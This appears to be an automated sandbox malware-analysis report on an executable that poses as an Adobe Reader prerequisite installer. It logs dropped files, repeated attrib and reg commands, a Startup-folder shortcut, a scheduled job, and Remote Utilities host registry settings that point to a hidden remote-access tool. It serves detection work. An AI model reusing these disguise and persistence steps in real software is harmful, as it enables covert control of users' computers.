Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Uses tasklist.exe to query information about running processes

Show sources

Source: unknown

Process created: C:\Windows\System32\tasklist.exe tasklist

Reads the Windows registered owner settings

Show sources

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Found GUI installer (many successful clicks)

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Automated click: Next >
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Automated click: Next >
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Automated click: Install
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Automated click: Install
Source: C:\Windows\System32\taskkill.exe	Automated click: Install
Source: C:\Windows\System32\taskkill.exe	Automated click: Next >
Source: C:\Windows\System32\taskkill.exe	Automated click: Next >
Source: C:\Windows\System32\taskkill.exe	Automated click: Install

Uses Rich Edit Controls

Show sources

Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe

File opened: C:\Windows\system32\msftedit.DLL

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Creates a software uninstall entry

Show sources

Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\H&S Tech 4.0.0.1

Submission file is bigger than most known malware samples

Show sources

Source: CDaNsQ7Rrd.exe

Static file information: File size 2523958 > 1048576

PE file contains a mix of data directories often seen in goodware

Show sources

Source: CDaNsQ7Rrd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CDaNsQ7Rrd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CDaNsQ7Rrd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CDaNsQ7Rrd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CDaNsQ7Rrd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CDaNsQ7Rrd.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: CDaNsQ7Rrd.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

Show sources

Source: CDaNsQ7Rrd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Show sources

Source:	Binary string: E:\Branch\win\Release\stubs\x86\ExternalUi.pdb source: CDaNsQ7Rrd.exe
Source:	Binary string: E:\Branch\win\Release\custact\x86\AICustAct.pdb source: CDaNsQ7Rrd.exe
Source:	Binary string: E:\Branch\win\Release\stubs\x86\ExternalUi.pdbL source: CDaNsQ7Rrd.exe

PE file contains a valid data directory to section mapping

Show sources

Source: CDaNsQ7Rrd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CDaNsQ7Rrd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CDaNsQ7Rrd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CDaNsQ7Rrd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CDaNsQ7Rrd.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

PE file contains an invalid checksum

Show sources

Source: CDaNsQ7Rrd.exe	Static PE information: real checksum: 0x16bb7d should be: 0x2781b4
Source: setup.exe.part.2.dr	Static PE information: real checksum: 0x3b377 should be:
Source: 7za.dll.8.dr	Static PE information: real checksum: 0x0 should be: 0x4352d
Source: fp.exe.23.dr	Static PE information: real checksum: 0x3b377 should be:
Source: 7zaa.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0xae01b

PE file contains sections with non-standard names

Show sources

Source: 7za.dll.8.dr	Static PE information: section name: .sxdata
Source: 7zaa.exe.8.dr	Static PE information: section name: .sxdata
Source: armforce.exe.25.dr	Static PE information: section name: .eh_fram

Persistence and Installation Behavior:

Uses cmd line tools excessively to alter registry or file data

Show sources

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Drops PE files

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSIEC54.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSIECF5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\Prereq.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	File created: C:\inst_fold\7zaa.exe	Jump to dropped file
Source: C:\inst_fold\7zaa.exe	File created: C:\inst_fold\fp.exe	Jump to dropped file
Source: C:\inst_fold\fp.exe	File created: C:\inst_fold\armstart.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aipackagechainer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31A3.tmp	Jump to dropped file
Source: C:\inst_fold\fp.exe	File created: C:\inst_fold\armforce.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSIB368.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe.part	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI973D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\lzmaextractor.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	File created: C:\inst_fold\7za.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\lzmaextractor.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI2A4F.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9546.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9605.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aipackagechainer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI3093.tmp	Jump to dropped file
Source: C:\inst_fold\fp.exe	File created: C:\inst_fold\armstatus.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	File created: C:\inst_fold\7zxa.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1F56.tmp	Jump to dropped file
Source: C:\inst_fold\armstart.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI6D94.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1B1D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aicustact.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31FE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI61FE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\MSI2B4A.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File created: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aicustact.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Show sources

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe.part

Jump to dropped file

Boot Survival:

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Show sources

Source: C:\Windows\explorer.exe

Window found: window name: Progman

Creates a start menu entry (Start Menu\Programs\Startup)

Show sources

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\armwake.lnk

Creates job files (autostart)

Show sources

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Tasks\{DE4C87A4-56DF-40F2-BF3B-9314F5F8610B}.job

Jump to behavior

Stores files to the Windows start menu directory

Show sources

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\armwake.lnk

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Show sources

Source: C:\Windows\regedit.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters Options

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\fp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\inst_fold\armstart.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\regedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Checks the free space of harddrives

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\Users\user\AppData\Roaming\Adobe FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\Users\user\AppData\Roaming\Adobe FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe	File Volume queried: C:\ FullSizeInformation

Enumerates the file system

Show sources

Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user
Source: C:\inst_fold\fp.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Windows\System32\msiexec.exe	Window / User API: threadDelayed 942
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 878
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 381

Found dropped PE file which has not been started or loaded

Show sources

Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSIEC54.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSIECF5.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\Prereq.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\lzmaextractor.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aipackagechainer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI9605.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Dropped PE file which has not been started: C:\inst_fold\7zxa.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1F56.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aipackagechainer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI6D94.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31A3.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI1B1D.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\aicustact.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI31FE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI61FE.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\lzmaextractor.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\MSI2B4A.tmp	Jump to dropped file
